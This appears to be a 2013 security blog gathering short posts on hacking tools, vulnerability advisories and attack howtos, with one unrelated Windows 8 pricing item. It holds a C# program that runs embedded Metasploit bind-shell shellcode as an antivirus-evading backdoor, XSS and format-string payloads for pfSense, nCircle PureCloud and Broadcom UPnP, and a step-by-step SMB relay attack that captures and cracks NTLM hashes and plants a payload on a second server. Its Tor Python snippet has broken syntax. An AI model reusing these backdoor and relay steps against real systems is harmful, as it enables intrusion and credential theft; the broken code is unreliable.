Feb 2, 2013

Cryptcat - encrypting netcat

Cryptcat is a lightweight version of netcat with integrated transport encryption capabilities.

Source: http://sourceforge.net/projects/cryptcat/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

NMap Script Engine For SCADA

Please download the script from Source.

nse scripts for scada identification
nmap --script ./Siemens-PCS7.nse -p 80
nmap -sU --script ./Siemens-Scalance-module.nse -p 161
nmap -sU --script ./Siemens-WINCC.nse -p 137

Source: https://github.com/drainware/nmap-scada


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Feb 1, 2013

Use .NET csc.exe to create a malicious EXE

I recommended to read the pdf(Undetect Backdoor) and Source, it's very nice :)

1. Create C# Backdoor with
using System; using System.Reflection; using System.Runtime.InteropServices; namespace ExecASMHardcoded {
        class Program
        {
                [DllImport("kernel32.dll", SetLastError = true)]
                static extern bool VirtualProtect(IntPtr lpAddress, uint dwSize, uint flNewProtect, out uint lpflOldProtect);

                public delegate uint Ret1ArgDelegate(uint address);
                static uint PlaceHolder1(uint arg1) { return 0; }

                public static byte[] asmBytes = new byte[]
                {
                        //msfvenom -p windows/shell_bind_tcp -e none | sed -e ‘s/\"//ig’ | sed -e ‘s/+//ig’ | sed -e ‘s/\\x/,0x/ig’
                        0xfc,0xe8,0×89,0×00,0×00,0×00,0×60,0×89,0xe5,0×31,0xd2,0×64,0x8b,0×52,
                        0×30,0x8b,0×52,0x0c,0x8b,0×52,0×14,0x8b,0×72,0×28,0x0f,0xb7,0x4a,0×26,
                        0×31,0xff,0×31,0xc0,0xac,0x3c,0×61,0x7c,0×02,0x2c,0×20,0xc1,0xcf,0x0d,
                        0×01,0xc7,0xe2,0xf0,0×52,0×57,0x8b,0×52,0×10,0x8b,0×42,0x3c,0×01,0xd0,
                        0x8b,0×40,0×78,0×85,0xc0,0×74,0x4a,0×01,0xd0,0×50,0x8b,0×48,0×18,0x8b,
                        0×58,0×20,0×01,0xd3,0xe3,0x3c,0×49,0x8b,0×34,0x8b,0×01,0xd6,0×31,0xff,
                        0×31,0xc0,0xac,0xc1,0xcf,0x0d,0×01,0xc7,0×38,0xe0,0×75,0xf4,0×03,0x7d,
                        0xf8,0x3b,0x7d,0×24,0×75,0xe2,0×58,0x8b,0×58,0×24,0×01,0xd3,0×66,0x8b,
                        0x0c,0x4b,0x8b,0×58,0x1c,0×01,0xd3,0x8b,0×04,0x8b,0×01,0xd0,0×89,0×44,
                        0×24,0×24,0x5b,0x5b,0×61,0×59,0x5a,0×51,0xff,0xe0,0×58,0x5f,0x5a,0x8b,
                        0×12,0xeb,0×86,0x5d,0×68,0×33,0×32,0×00,0×00,0×68,0×77,0×73,0×32,0x5f,
                        0×54,0×68,0x4c,0×77,0×26,0×07,0xff,0xd5,0xb8,0×90,0×01,0×00,0×00,0×29,
                        0xc4,0×54,0×50,0×68,0×29,0×80,0x6b,0×00,0xff,0xd5,0×50,0×50,0×50,0×50,
                        0×40,0×50,0×40,0×50,0×68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0×89,0xc7,0×31,
                        0xdb,0×53,0×68,0×02,0×00,0×11,0x5c,0×89,0xe6,0x6a,0×10,0×56,0×57,0×68,
                        0xc2,0xdb,0×37,0×67,0xff,0xd5,0×53,0×57,0×68,0xb7,0xe9,0×38,0xff,0xff,
                        0xd5,0×53,0×53,0×57,0×68,0×74,0xec,0x3b,0xe1,0xff,0xd5,0×57,0×89,0xc7,
                        0×68,0×75,0x6e,0x4d,0×61,0xff,0xd5,0×68,0×63,0x6d,0×64,0×00,0×89,0xe3,
                        0×57,0×57,0×57,0×31,0xf6,0x6a,0×12,0×59,0×56,0xe2,0xfd,0×66,0xc7,0×44,
                        0×24,0x3c,0×01,0×01,0x8d,0×44,0×24,0×10,0xc6,0×00,0×44,0×54,0×50,0×56,
                        0×56,0×56,0×46,0×56,0x4e,0×56,0×56,0×53,0×56,0×68,0×79,0xcc,0x3f,0×86,
                        0xff,0xd5,0×89,0xe0,0x4e,0×56,0×46,0xff,0×30,0×68,0×08,0×87,0x1d,0×60,
                        0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0×56,0×68,0xa6,0×95,0xbd,0x9d,0xff,0xd5,
                        0x3c,0×06,0x7c,0x0a,0×80,0xfb,0xe0,0×75,0×05,0xbb,0×47,0×13,0×72,0x6f,
                        0x6a,0×00,0×53,0xff,0xd5,
                };

                unsafe static void Main(string[] args)
                {
                        fixed (byte* startAddress = &asmBytes[0]) // Take the address of our x86 code
                        {
                                // Get the FieldInfo for "_methodPtr"
                                Type delType = typeof(Delegate);
                                FieldInfo _methodPtr = delType.GetField("_methodPtr", BindingFlags.NonPublic |
                                BindingFlags.Instance);

                                // Set our delegate to our x86 code
                                Ret1ArgDelegate del = new Ret1ArgDelegate(PlaceHolder1);
                                _methodPtr.SetValue(del, (IntPtr) startAddress);

                                //Disable protection
                                uint outOldProtection;
                                VirtualProtect((IntPtr) startAddress, (uint) asmBytes.Length, 0×40, out outOldProtection);
                                // Enjoy
                                uint n = (uint)0×00000001;
                                n = del(n);
                                Console.WriteLine("{0:x}", n);
                                Console.ReadKey();
                        }
                }
        }
}
 
 
2. Compile and pack it with csc.exe.
C:\Documents and Settings\Administrator\Desktop>C:\WINDOWS\Microsoft.NET\Framewo
rk\v4.0.30319\csc.exe /unsafe shell_bind.cs
Microsoft (R) Visual C# 2010 Compiler version 4.0.30319.1
Copyright (C) Microsoft Corporation. All rights reserved. 

3. Run shell_bind.exe to be the backdoor

4. Connect the backdoor with nc
C:\Documents and Settings\Administrator\Desktop>ncat -vv 127.0.0.1 4444  




Source: http://www.phillips321.co.uk/2013/01/25/use-net-csc-exe-to-create-a-malicious-dllexe-on-locked-down-systems/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Broadcom UPnP Remote Preauth Root Code Execution Vulnerability

Advisory ID: DC-2013-01-003
Advisory Title: Broadcom UPnP Remote Preauth Root Code Execution
Vulnerability
Advisory URL: http://www.defensecode.com/subcategory/advisories-28
Software: Broadcom UPnP software
Vulnerable: Multiple router manufacturers
Vendor Status: Vendors contacted
Initial Release Date: 2013-01-15
Release Date Postponed To: 2013-01-31
Risk: Critical



1. General Overview
===================

During the security evaluation of Cisco Linksys routers for a client,
we have discovered a critical security vulnerability that allows remote
unauthenticated attacker to remotely execute arbitrary code under root
privileges.
Upon initial vulnerability announcement a few weeks ago Cisco spokesman
stated that only one router model is vulnerable - WRT54GL.
We have continued with our research and found that, in fact, same
vulnerable firmware component is also used in at least two other Cisco
Linksys models - WRT54G3G and probably WRT310N. Could be others.

Moreover, vulnerability turns out even more dangerous, since we have
discovered that same vulnerable firmware component is also used across
many other big-brand router manufacturers and many smaller vendors.

Vulnerability itself is located in Broadcom UPnP stack, which is used by
many router manufacturers that produce or produced routers based on
Broadcom chipset.
We have contacted them with vulnerability details and we expect patches
soon. However, we would like to point out that we have sent more than 200
e-mails to various router manufacturers and various people, without much
success.

Some of the manufacturers contacted regarding this vulnerability are
Broadcom, Asus, Cisco, TP-Link, Zyxel, D-Link, Netgear, US Robotics,
and so on.
Routers with vulnerable Broadcom UPnP stack are mostly based on Broadcom
UPnP chipset. You can check how many manufacturers use Broadcom chipset
here: http://wiki.openwrt.org/toh/start  (search for Broadcom, brcm
or bcm).

We don't know exactly how many of them are affected, since we were unable
to contact all of them, but we suspect there are probably tens of millions
vulnerable routers out there.

According to separate recent vulnerability disclosure by Rapid7 in another
UPnP implementation (libupnp):
"In all, 73 per cent of problems occur with products based on four SDKs,
the report found. These are Portable SDK for UPnP Devices; MiniUPnP; a
third, commercial stack that is likely developed by Broadcom; and another
commercial SDK that could not be tracked to a specific developer."
- Rapid7

Many routers have their UPnP interface available over the WAN interface,
so the vulnerability can also be exploited over the internet. It seems
that, at the moment, only popular UPnP implementation that's not hit by
remote preauth security vulnerability is MiniUPnP.



2. Software Overview
====================

Broadcom UPnP is UPnP (Universal Plug and Play) protocol implementation
developed by Broadcom, and often used on routers shipped with Broadcom
chipset.
Vulnerability described in this advisory is located within wanipc and
wanppp modules of Broadcom UPnP stack.
Universal Plug and Play (UPnP) is a set of networking protocols that
permits networked devices, such as personal computers, printers, Internet
gateways, Wi-Fi access points and mobile devices to seamlessly discover
each other's presence on the network and establish functional network
services for data sharing, communications, and entertainment.



3. Vulnerability Description
============================

During the security analysis, we have discovered remote preauth format
string vulnerability in Broadcom UPnP stack. Vulnerability can be
exploited to write arbitrary values to arbitrary memory address, and
also to remotely read router memory. When properly exploited, it allows
unauthenticated attacker to execute arbitrary code under root account.

Full exploit was previously demonstrated in the following video on Cisco
Linksys WRT54GL, that is also based on Broadcom UPnP stack:
http://www.youtube.com/watch?v=cv-MbL7KFKE.

Vulnerability is present in SetConnectionType function of wanipc and
wanppp modules. Vulnerability itself can be reached with a single SOAP
request that calls SetConnectionType function.

SetConnectionType:
------------------
<?xml version="1.0"?>
<SOAP-ENV:Envelope...>
<SOAP-ENV:Body>
    <m:SetConnectionType
xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1" as="">
<NewConnectionType>#FORMAT_STRING#</NewConnectionType>
    </m:SetConnectionType>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
------------------

Format string output is available through GetConnectionTypeInfo SOAP
request as presented below.

GetConnectionTypeInfo:
------------------
<?xml version="1.0"?>
<SOAP-ENV:Envelope...>
<SOAP-ENV:Body>
    <m:GetConnectionTypeInfo
xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1">
    </m:GetConnectionTypeInfo>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
------------------

Format string vulnerability is present because user-input from SOAP
request is supplied as a format string argument to the snprintf() function
in files wanipc.c and wanpp.c.
Vulnerable code lines are located in the following files and code lines:

/upnp/igd/wanipc.c:
-------------------
static int SetConnectionType(UFILE *uclient, PService psvc, PAction ac,
pvar_entry_t
args, int nargs) {
      snprintf(psvc->vars[VAR_ConnectionType].value,
sizeof(psvc->vars[VAR_ConnectionType].value), ac->params[0].value);

      return TRUE;
}
-------------------

/upnp/igd/wanppp.c:
-------------------
int WANPPPConnection_SetConnectionType(UFILE *uclient, PService psvc,
PAction ac,
pvar_entry_t args, int nargs)
/*     "SetConnectionType", WANPPPConnection_SetConnectionType, */
{
      snprintf(psvc->vars[VAR_ConnectionType].value,
sizeof(psvc->vars[VAR_ConnectionType].value), ac->params[0].value);

      return TRUE;
}
-------------------



4. Solution
===========

Since vulnerability is spread across multiple router manufacturers, and
we were unable to reach all of them on this matter, it's unclear how long
it will take certain manufacturers to patch it. Especially those that we
were unable to contact. However, we're open to any questions from vendors
regarding this vulnerability. Moreover, during the contact with one
particular vendor, we were asked if the vulnerability is in
<name-intentionally-removed> function. It wasn't. But that quickly led us
to yet another vulnerability in also popular router software, obviously
already reported to router manufacturers by someone, but still non-public.
ADVISORY UPDATE: That turns out to be libupnp vulnerability disclosed by
Rapid7.



5. The Exploit
==============

We have developed working exploit as demonstrated in video
http://www.youtube.com/watch?v=cv-MbL7KFKE, but because of the
vulnerability impact and presence of this vulnerability across multiple
router manufacturers, we won't publish the exploit.

Source: http://packetstormsecurity.com/files/119935


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Upgrade Windows 7 to Windows 8 with 39.99$ before gonna be 119.99$

As Microsoft's ridiculously low price for upgrading older Windows systems to Windows 8 comes to a close tomorrow, the company has revealed a plan to let students upgrade to Windows 8 Pro for less than half the standard rate.
Microsoft's been running a deal since the Windows 8 launch in October where people who wanted to upgrade Windows XP, Vista, or Windows 7 to Windows 8 could pay only $39.99, but that deal will end tomorrow. As of February 1, upgrading an older Windows computer to Windows 8 will run you $119.99 for the standard edition, or $199.99 for Windows 8 Pro.


Students, however, get a reprieve from the full cost of upgrading. If you've got a valid .edu email account through a qualifying educational institution, you can upgrade from one of the aforementioned systems to Windows 8 Pro for $69.99 starting February 1 if you live in the United States -- a discount of 65 percent.
Non-U.S. residents of 49 countries will receive the discount offer as well, but on a rolling basis. Most English-speaking countries, including Canada, the United Kingdom, Australia, and New Zealand, and Western Europe will get access to the discount on February 21. Eastern Europe and some Asian countries will follow on March 7, with the Middle East and others on March 19.
Updated 1:33 p.m. PDT on January 30, 2013, to clarify that the student discount is for Windows 8 Pro. 

Source:  http://reviews.cnet.com/8301-33642_7-57566725-292/students-to-get-windows-8-upgrade-discount/




If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jan 31, 2013

Unicode security testing library

if you want all of information, please go to the Source.

Major features:

  • Contains methods to get best fit mappings.  For example, you want to know all the characters in various legacy encodings that transform to "<" or some other ASCII character.
  • Contains methods to get Unicode normalization mappings.  For example, you wan to know if any special Unicode characters will transform to ">" or some other ASCII character.
  • Contains a small set of hard-coded Unicode characters useful in fuzzing, as well as some functions for returning invalid byte sequences or characters that .NET would not allow by itself (because they're not well-formed).  
    • ill-formed byte sequences
    • Unicode non-characters (an oxymoron?)
    • private use area (PUA)
    • unassigned code points
    • code points with special meaning such as the BOM and RLO
    • half-surrogate values like U+DEAD, a very nasty little guy all by itself

Source: http://web.lookout.net/2013/01/unicode-security-testing-library.html


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jan 30, 2013

DDoS Attacks in 2012


 Source: http://pinterest.com/pin/307933693241382755/
If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

pfSense <= 2.0.1 XSS & CSRF during IPSec XAuth authentication

If you want to get all detail, please go to the Source.

Vulnerability Summary
┌──────────────────────┘
 pfSense versions 2.0.1 and prior are vulnerable to semi-persistent XSS and CSRF attack vectors, exploited by sending Javascript/HTML code as a username during the XAuth user authentication phase.
 XAUTH provides extended authentication for IPSec telecommuters by using authentication schemes such as RADIUS or internal user databases. [source: www.ciscopress.org]
 The vulnarability lies in diag_logs_ipsec.php which does not properly escape HTML characters in the Racoon log files.
 It is assumed that the attacker has successfully completed IPSEC Phase 1 and Phase 2 based on one of the following schemes:
    . Mutual RSA
    . Mutual PSK
    . Hybrid RSA
 It should also be noted that newer pfSense version use CSRF-magic on the majority of Web GUI forms, thus the CSRF exploitation likelihood is minimized at least in the standard installation.


 Exploit Path
┌─────────────┘
 1) Perform the Phase 1 and Phase 2 using a VPN Client and known credentials/certificates
 2) During the XAuth provide a username like "><script>alert("XSS")</script> and a random password
 3) The reflection of the XSS/CSRF is in the logs under Status > System Logs > IPSec
 The XSS "time-to-live" depends on the Racoon logging verbosity, max number of log lines and vpn activity. Nevertheless, it can be resubmitted to be shown again on top.

 
 Solution
┌─────────┘
 Patch available by vendor, streamlined to 2.1
 URL: http://redmine.pfsense.org/projects/pfsense-tools/repository/revisions/0675bde3039a94ee2cadc360875095b797af018f


Source: http://packetstormsecurity.com/files/119889

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jan 29, 2013

nCloud PureCloud has multiple vulnerabilities

Abstract:
=========
The Vulnerability-Laboratory Research Team discovered a web vulnerability in the nCircle PureCloud (cloud-based) Vulnerability Scanner Application.


Report-Timeline:
================
2012-12-24:  Researcher Notification & Coordination
2012-12-25:  Vendor Notification
2012-01-16:  Vendor Response/Feedback
2012-01-28:  Vendor Fix/Patch by nCricle Dev
2012-01-28:  Public Disclosure


Status:
========
Published


Affected Products:
==================
nCircle
Product: PureCloud - Vulnerability Scanner (cloud-based) 2012 Q4


Exploitation-Technique:
=======================
Remote


Severity:
=========
Medium


Details:
========
A persistent and client side POST Injection web vulnerability is detected in the in the nCircle PureCloud (cloud-based) Vulnerability Scanner Application.
The vulnerability typus allows an attacker to inject own malicious script code in the vulnerable module on application side (persistent).

1.1
The first vulnerability is located in the Scan Now > Scan Type > Perimeter Scan > Scan section when processing to request via the
`Scan Specific Devices - [Add Devices]` module and the bound vulnerable formErrorContent exception-handling application parameters.
The persistent injected script code will be executed out of the `invalid networks` web application exception-handling. To bypass
the standard validation of the application filter the attacker need to provoke the specific invalid networks exception-handling error.
In the secound step the attacker splits the request of the invalid filter context to execute after it the not parsed malicious script code.
The vulnerability can be exploited on client side via force manipulated link as malicious request with medium user interaction but also
via server side by a post injection in the later affected add server listing module.

1.2
The secound vulnerability is bound to the first issue and located in the IP & Name output listing of the scan index after processing to
add a network/server/ip. The code will be executed out of the main ip & name listing after an evil inject via add module. To bypass the
ip restriction filter it is required to split the request like in the first issue with a valid ip. The remote attacker includes a
valid ip+split(%20)`+own_scriptcode to pass through the system validation filter and execute the script code out of the device name and ip listing.


The vulnerability can be exploited with privileged application user account and low or medium required user interaction.
Successful exploitation of the vulnerability result in persistent/non-persistent session hijacking, persistent/non-persistent
phishing, external redirect, external malware loads and persistent/non-persistent vulnerable module context manipulation.


Vulnerable Service(s):
        [+] nCircle PureCloud (cloud-based) Vulnerability Scanner [https://purecloud.ncircle.com/index/]

Vulnerable Section(s):
        [+] Scan Now > Scan Type > Perimeter Scan > Scan

Vulnerable Module(s):
        [+] Scan Specific Devices - [Add Devices]
        [+] Scan IP (Index)

Vulnerable Parameter(s):
        [+] formErrorContent
        [+] ip &- name

Affected Module(s):
        [+] Exception Handling - Invalid Network(s)
        [+] Scan Index - Listing


Proof of Concept:
=================
The client- & server-side web vulnerability can be exploited by remote attackers and local privileged application user accounts with
low or medium user interaction. For demonstration or reproduce ...

1.1
Note:
When you try to inject a standard iframe, img src, script or onload the context will be parsed by the exception-handling to
prevent the first execution after the inject attempt. To bypass the validation we first inject a frame which matches with the invalid
exception filter to display the error. Now, we split the request with %20 and inject our code after the split via POST.

Manually Exploitation:
1. Register an account at nCircle PureCloud to get access to the (cloud-based) Vulnerability Scanner- [https://purecloud.ncircle.com/registerinfo3/?hacknewssocial]
2. Login to your account and switch to the scan now menu, open the scan type site
3. Choose the Perimeter Scan, not the local one!
4. Include a standard script alert tag to provoke the exception-handling, split the request with %20' and inject your own frame onload script code. Save via Add!
5. The scirpt code will be executed out of the exception-handling invalid networks message.
6. Done #1 ... Successful reproduced! Press Continue to exploit also the listing :)

7. Include a valid ip, split the request (bypass the input restriction) and inject after it your own script code.
8. Watch the scan index. The code will be executed out of the vulnerable name and ip value output listing.
9. Done #2 ... Successful reproduced!

PoC:
#1 <iframe src=PROVOKEINVALIDEXCEPTION1> %20' >"<[OWN INJECTED PERSISTENT SCRIPT CODE!]>
#2 <script>alert("PROVOKEINVALIDEXCEPTION2")</script> < %20' "><[OWN INJECTED PERSISTENT SCRIPT CODE!]) <


Review: Scan Specific Devices > [Add Devices] - Exception Handling - Invalid Network(s)

<div style="opacity: 0.87; position: absolute; top: 287px; left: 461px; margin-top: -200px;"
class="id_add_hosts_textformError parentFormscan-form formError">
<div class="formErrorContent">
The following networks are invalid: %20"><"><script>alert(\"PROVOKEEXCEPTION\")> < %20' ">"<[PERSISTENT/NON-PERSISTENT INJECTED SCRIPT CODE!]>
(host not found)</iframe></div><div class="formErrorArrow"><div class="line10"><!-- --></div><div class="line9"><!-- --></div>
<div class="line8"><!-- --></div><div class="line7"><!-- --></div><div class="line6"><!-- --></div><div class="line5"><!-- --></div>
<div class="line4"><!-- --></div><div class="line3"><!-- --></div><div class="line2"><!-- --></div><div class="line1"><!-- --></div></div></div>
<input value="%20"><iframe src=[PROVOKE!]>%20 >"<[PERSISTENT/NON-PERSISTENT INJECTED SCRIPT CODE!]>"
id="id_add_hosts_text" tabindex="5" class="wizardInput" placeholder="Add Devices" type="text">
<button id="add_button" class="addButton">Add</button>
</div>


--- Manipulated POST Values ---
csrfmiddlewaretoken=HX0rcMdE3EK40Ed1g2pMeSauuQl2rt9N
json_data={"connector":-1,"scan_connected_network":false,
"registration_id":"","scope_name":"","editing_scope_schedule":false,
"webapp":false,"targets":["><script>alert(\"PROVOKEEXCEPTION\")> < %20' ">"<[PERSISTENT/NON-PERSISTENT INJECTED SCRIPT CODE!]) <"]}


--- Manipulated POST Request ---

Status: 200[OK]

POST https://purecloud.ncircle.com/services/validate_targets/
Load Flags[LOAD_BYPASS_CACHE  LOAD_BACKGROUND  ] Größe des Inhalts[181] Mime Type[application/json]
  
Request Header:
      Host[purecloud.ncircle.com]
     
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0]
     
Accept[application/json, text/javascript, */*; q=0.01]
      Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
     
Accept-Encoding[gzip, deflate]
      DNT[1]
      Connection[keep-alive]
      Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
     
X-Requested-With[XMLHttpRequest]
      Referer[https://purecloud.ncircle.com/index/]
      Content-Length[439]
     
Cookie[csrftoken=HX0rcMdE3EK40Ed1g2pMeSauuQl2rt9N;
sessionid=8c8624ba5e31c63bf24bcbf9af796743;
BIGipServerPICO-443to80=1875711404.20480.0000; utmcct=/ben37.root; wcsid=uNTCNCc0tpp1NCv01YCYlGfr93631472;
hblid=kRw3BvqhoczGhyJc8E8J5dYW93631472;
_oklv=1356379996583%2CuNTCNCc0tpp1NCv01YCYlGfr93631472;
olfsk=olfsk02835150931791619;
_okbk=cd5%3Davailable%2Ccd4%3Dtrue%2Cwa1%3Dfalse%2Cvi5%3D0%2Cvi4%3D1356378355284%2Cvi3%3Dactive%2Cvi2%3Dfalse%2Cvi1%3Dfalse%2Ccd8
%3Dchat%2Ccd6%3D0%2Ccd3%3Dfalse%2Ccd2%3D0%2Ccd1%3D0%2C; _ok=9363-144-10-3734; __unam=97cb67-13bce735458-18f208d4-21;
_mkto_trk=id:671-RXE-353&token:_mch-ncircle.com-1356378363952-41877]
      Pragma[no-cache]
      Cache-Control[no-cache]
  

POST-Daten:
csrfmiddlewaretoken[HX0rcMdE3EK40Ed1g2pMeSauuQl2rt9N]
     
json_data[%7B%22connector%22%3A-1%2C%22scan_connected_network%22%3Afalse%2C%22registration_id%22%3A%22%22%2C%22scope_name
%22%3A%22%22%2C%22editing_scope_schedule%22%3Afalse%2C%22webapp%22%3Afalse%2C%22targets%22%3A%5B%22%2520%5C%22+%2520+%5C%22%3E%3C
iframe+src%3Da+onload%3Dalert(%5C%22PROVOKEEXCEPtION%5C%22)+%3C++%5C%22%3E%3C[PERSISTENT/NON-PERSISTENT INJECTED SCRIPT CODE!])+%3C%22%5D%7D]
  

Response Header:
Date[Mon, 24 Dec 2012 20:13:25 GMT]
Server[Apache]
Content-Language[en]
Content-Encoding[gzip]
Vary[Accept-Language,Cookie,Accept-Encoding]
X-Frame-Options[SAMEORIGIN]
Content-Length[181]
Keep-Alive[timeout=15, max=76]
Connection[Keep-Alive]
Content-Type[application/json]


1.2
The server-side (persistent) web vulnerability can be exploited by remote attackers and local privileged application user accounts with
low user interaction. For demonstration or reproduce ...

PoC:
[VALID IP]%20'+%20>"<><[PERSISTENT SCRIPT CODE!]+...
[VALID NAME]%20'+%20>"<><[PERSISTENT SCRIPT CODE!]+...


Solution:
=========
Parse the exception-handling error output listing and disallow error echos with requested web context.
To fix the vulnerability parse the context of the input fields in the add devices module. Restrict the the input fields with a secure filter mask.
Parse also the name & ip scan index output listing and restrict the input of the requested web context scan listing.

2012-01-28:  Vendor Fix/Patch by nCricle Dev

Source: http://packetstormsecurity.com/files/119867

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jan 28, 2013

Howto: Tor With Python

import socket
import socks
import httplib

def start_connect_tor()
    socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5,127.0.0.1,9050,True)
    socket.socket = socks.socksocket

def identify_tor()
    socks.setdefaultproxy()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("127.0.0.1",9051))
    s.send("AUTHENTICATE\r\n")
    respose = s.recv(128)
    if response.startswith("250"):
        s.send("SIGNAL NEWNYM\r\n")
    s.close()
    start_connect_tor()

def main();
    start_connect_tor()
    print("Connected to Tor Network")
    conn = httplib.HTTPConnection("www.google.com")
    conn.request("GET","/")
    response = conn.getresponse()
    print(response.read())

    identify_tor()

if __name__ == "__main__":
    main()


Source:  http://www.youtube.com/watch?v=KDsmVH7eJCs
 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Exploit Nagios 3 History.cgi Host Command Injection With Metasploit

1. Go into Metasploit Console

2. Use Nagios History.cgi Module
use exploit/unix/webapp/nagios3_history_cgi

3. Set Target Host

4. Set Target URI

5. set PAYLOAD

6. Run it.      

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Pivot network with Metasploit session

1. You should get the meterpreter session on victim.

2. Add routing with
run autoroute -s 192.168.168.0/24

3. Now you have already add routing, try to use another post module of Metasploit with
background   

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Metasploit smb relay attack

If you want to see full detail, please go to the Source.

1. Start the Metasploit “smb” capture module to grab password hashes on the attacker’s system:
msfconsole
use auxiliary/server/capture/smb
set CAINPWFILE /cain_hashes.txt
set JOHNPWFILE /john_hashes.txt
exploit

2. Execute the “mssql_ntlm_stealer” metasploit module to initiate SMB authentication via SQL Server 1 using domain credententials:
  • msfconsole use auxiliary/admin/mssql/mssql_ntlm_stealer 
  • set USE_WINDOWS_AUTHENT true 
  • set DOMAIN DEMO 
  • set USERNAME test 
  • set PASSWORD Password12
  • set RHOST 192.168.1.100
  • set RPORT 1433
  • set SMBPROXY 192.168.1.102
  • msf auxiliary(mssql_ntlm_stealer) > run
  • [*] DONT FORGET to run a SMB capture or relay module! [*] 
  • Forcing SQL Server at 192.168.1.100 to auth to 192.168.1.102 via xp_dirtree... [*] 
  • SMB Captured - 2012-11-26 10:45:35 -0600 NTLMv1 Response Captured from 192.168.1.100:1051 - 192.168.1.100 USER:sqlaccount DOMAIN:LVA OS:Windows Server 2003 3790 Service Pack 2 LM: LMHASH:b0b6932dae11731fc8ddf907024858f89fd700cd9fb72170 NTHASH:c180596a2d116a3c70c329de3a7b097c15fb75cb07822d08 
  • [+] Successfully executed xp_dirtree on 192.168.1.100 
  • [+] Go check your SMB relay or capture module for goodies! 
  • [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
3. Crack the first 16 characters of the recovered LANMAN hash with rcracki and a seeded half LM Rainbow Tables. Both can be downloaded from http://www.project-rainbowcrack.com.

  • C:\>rcracki_mt -h b0b6932dae11731f ./halflmchall 
  • Using 1 threads for pre-calculation and false alarm checking... 
  • Found 4 rainbowtable files... 
  • halflmchall_alpha-numeric#1-7_0_2400x57648865_1122334455667788_distrrtgen[p][i]_0.rti: 
  • reading index... 13528977 bytes read, disk access time: 0.14 s
  • reading table... 461190920 bytes read, disk access time: 4.55 s searching for 1 hash... 
  • plaintext of b0b6932dae11731f is WINTER2 
  • cryptanalysis time: 0.96 s statistics 
  • ------------------------------------------------------- 
  •  
  • plaintext found: 1 of 1 (100.00%) 
  • total disk access time: 4.68 s total 
  • cryptanalysis time: 0.96 s 
  • total pre-calculation time: 2.07 s 
  • total chain walk step: 2876401 
  • total false alarm: 1215 
  • total chain walk step due to false alarm: 1299561 result
  • ------------------------------------------------------- 
  • b0b6932dae11731f WINTER2 hex:57494e54455232
 4. Crack the second half with john the ripper to obtain the case insensitive full LM password. Use the netntlm.pl script from the jumbo pack. They can be downloaded from http://www.openwall.com/john/.

C:\>perl netntlm.pl --seed WINTER2 --file john_hashes.txt
…[TRUNCATED]… Loaded 1 password hash (LM C/R DES [netlm])
WINTER2012 (sqlaccount)
guesses: 1 time: 0:00:00:10 DONE (Mon Nov 26 10:59:56 2012)
c/s: 428962 trying: WINTER204K - WINTER211IA
…[TRUNCATED]

5. Run the same command again to obtain the case sensitve password.

C:\>perl netntlm.pl --seed WINTER2 --file john_hashes.txt
 …[TRUNCATED]…
Performing NTLM case-sensitive crack for account: sqlaccount.
guesses: 1 time: 0:00:00:00 DONE (Mon Nov 26 11:01:54 2012)
c/s: 1454 trying: WINTER2012 - winter2012
Use the "--show" option to display all of the cracked passwords reliably
Loaded 1 password hash (NTLMv1 C/R MD4 DES [ESS MD5] [netntlm])
Winter2012 (sqlaccount)
…[TRUCATED]…

6. Start the Metasploit “smb_relay” module to relay authentication to SQL Server 2:
msfconsole use exploit/windows/smb/smb_relay
set SMBHOST 192.168.1.101
exploit

7. Configure and execute the “mssql_ntlm_stealer” Metasploit module against SQL Server 1:
  1. msfconsole
    use auxiliary/admin/mssql/mssql_ntlm_stealer
    set USE_WINDOWS_AUTHENT true
    set DOMAIN DEMO
    set USERNAME test
    set PASSWORD Password12
    set RHOST 192.168.1.100
    set RPORT 1433
    Set SMBPROXY 192.168.1.102
    
    msf  auxiliary(mssql_ntlm_stealer) > run
    
    [*] DONT FORGET to run a SMB capture or relay module!
    [*] Forcing SQL Server at 192.168.1.100 to auth to 192.168.1.102 via xp_dirtree...
    [*] Received 192.168.1.100:1058 LVA\sqlaccount LMHASH:feefee989
    c0b45f833b7635f0d2ffd667f4bd0019c952d5a NTHASH:8f3e0be3190fee6b
    d17b793df4ace8f96e59d324723fcc95 OS:Windows Server 2003 3790
    Service Pack 2 LM:
    [*] Authenticating to 192.168.1.101 as LVA\sqlaccount...
    [*] AUTHENTICATED as LVA\sqlaccount...
    [*] Connecting to the ADMIN$ share...
    [*] Regenerating the payload...
    [*] Uploading payload...
    [*] Created \saEQcXca.exe...
    [*] Connecting to the Service Control Manager...
    [*] Obtaining a service manager handle...
    [*] Creating a new service...
    [*] Closing service handle...
    [*] Opening service...
    [*] Starting the service...
    [*] Removing the service...
    [*] Sending stage (752128 bytes) to 192.168.1.101
    [*] Closing service handle...
    [*] Deleting \saEQcXca.exe...
    [*] Sending Access Denied to 192.168.1.100:1058 LVA\sqlaccount
    [+] Successfully executed xp_dirtree on 192.168.1.100
    [+] Go check your SMB relay or capture module for goodies!
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf  auxiliary(mssql_ntlm_stealer) >
